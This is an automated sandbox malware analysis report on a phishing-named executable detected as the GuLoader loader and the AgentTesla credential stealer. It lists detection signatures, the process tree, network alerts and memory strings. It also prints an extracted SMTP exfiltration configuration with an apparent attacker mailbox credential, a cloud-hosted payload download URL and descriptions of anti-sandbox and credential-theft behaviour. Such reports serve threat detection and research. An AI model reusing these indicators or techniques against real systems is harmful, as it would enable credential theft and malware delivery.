Loading ...

Play interactive tourEdit tour

Windows Analysis Report Statement of Account.exe

Overview

General Information

Sample Name:Statement of Account.exe
Analysis ID:1640
MD5:1232806812f946a2afabc5f5fe489de5
SHA1:f9a820627667403e90b3a387de0b644f8f0ddc31
SHA256:86907475c81bc4700fc465c758592c51e905feed8aecdc0c10ccb6a8c650218a
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Statement of Account.exe (PID: 2204 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 1232806812F946A2AFABC5F5FE489DE5)
    • RegAsm.exe (PID: 3428 cmdline: 'C:\Users\user\Desktop\Statement of Account.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 1820 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 3484 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 3428JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 3428JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 65.60.11.90, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 3428, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49821

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.3088.17.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Statement of Account.exeReversingLabs: Detection: 23%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32DA50 CryptUnprotectData,9_2_1D32DA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32E0FB CryptUnprotectData,9_2_1D32E0FB
            Source: Statement of Account.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then sub ecx, F6DD248Dh1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403827
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403697
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403697
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004038AC
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040371F
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040371F
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004039C9
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403581
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403581
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403586
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403586
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403588
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403588
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040358E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040358E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403592
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403592
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403596
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403596
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_00403598
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_00403598
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359C
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_0040359E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_0040359E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A0
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A0
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A2
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A2
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A6
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A6
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035A8
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035A8
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004035AA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004035AA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edi, edi1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 4x nop then mov edx, edx1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 5x nop then xor eax, dword ptr [edx+esi]1_2_004031BE

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49821 -> 65.60.11.90:587
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
            Source: global trafficTCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000009.00000002.52067274835.000000001E46F000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://LUDB17WCKZR.org
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: http://VpGUaC.com
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpString found in binary or memory: http://friendsequipment.com
            Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpString found in binary or memory: http://mail.friendsequipment.com
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.com
            Source: RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/4
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l
            Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/Q
            Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
            Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: Statement of Account.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004018681_2_00401868
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004032481_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040225E1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040346B1_2_0040346B
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004036111_2_00403611
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004032D41_2_004032D4
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040336A1_2_0040336A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004033EA1_2_004033EA
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004035901_2_00403590
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004031BE1_2_004031BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012811309_2_01281130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012843209_2_01284320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01283A509_2_01283A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0128D4909_2_0128D490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0128C7309_2_0128C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012837089_2_01283708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012915F09_2_012915F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01296F109_2_01296F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B3889_2_0133B388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133ED489_2_0133ED48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013394BF9_2_013394BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133BEF89_2_0133BEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B9B29_2_0133B9B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D1AE9_2_0133D1AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D1FA9_2_0133D1FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133B9EA9_2_0133B9EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D3AF9_2_0133D3AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013332829_2_01333282
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133D2D29_2_0133D2D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_013337D89_2_013337D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32A9289_2_1D32A928
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32B1709_2_1D32B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D3224809_2_1D322480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D325E289_2_1D325E28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32F1309_2_1D32F130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D323DB89_2_1D323DB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D32B0709_2_1D32B070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B49E89_2_1D7B49E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B78E09_2_1D7B78E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B0BD09_2_1D7B0BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B00409_2_1D7B0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B73609_2_1D7B7360
